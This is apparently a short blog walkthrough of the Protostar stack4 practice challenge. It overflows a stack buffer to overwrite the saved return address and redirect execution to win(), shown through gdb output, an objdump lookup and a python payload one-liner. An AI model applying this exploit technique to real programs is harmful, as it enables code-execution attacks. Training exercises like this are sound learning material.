Encapsulating

Protostar – stack4

This exercise looks at overwriting the EIP, which sits behind the EBP (and possibly some padding), so we’ll need to determine where EIP is. Let’s piss all over the stack:

0.08 0.14 0.10  root kali ➜  ~  pwgen 80
as6xoz0aengohBe0sieNg1ifoh7moeNgiZi5tahkeif2ohD5shaeKohbi5thoohie5keona2se0aib4g

gdb$ run 
as6xoz0aengohBe0sieNg1ifoh7moeNgiZi5tahkeif2ohD5shaeKohbi5thoohie5keona2se0aib4g

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
  EAX: 0xBFFFF740  EBX: 0xB7FD7FF4  ECX: 0xBFFFF740  EDX: 0xB7FD9334  o d I t s Z a P c 
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0x61306573  ESP: 0xBFFFF790  EIP: 0x67346269
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007BError while running hook_stop:
Cannot access memory at address 0x67346269
0x67346269 in ?? ()
gdb$

0x67346269 is “g4bi”, the end of the string we shoved in. Let’s find out win() address:

user@protostar:/opt/protostar/bin$ objdump -S stack4 | grep "win"
080483f4 <win>:

Fun, let’s add that in place of the “g4bi” string:

user@protostar:/opt/protostar/bin$ python -c 'print("......ohbi5thoohie5keona2se0a\xf4\x83\x04\x08");' > /tmp/stack4_trick
user@protostar:/opt/protostar/bin$ gdb stack4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/stack4...done.
gdb$ run < /tmp/stack4_trick 
code flow successfully changed

Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
  EAX: 0x0000001F  EBX: 0xB7FD7FF4  ECX: 0xB7FD84C0  EDX: 0xB7FD9340  o d I t s Z a P c 
  ESI: 0x00000000  EDI: 0x00000000  EBP: 0x61306573  ESP: 0xBFFFF794  EIP: 0x00000000
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007BError while running hook_stop:
Cannot access memory at address 0x0
0x00000000 in ?? ()
gdb$

Angel.

This entry was posted on 21 October, 2013 by . It was filed under News .

Leave a comment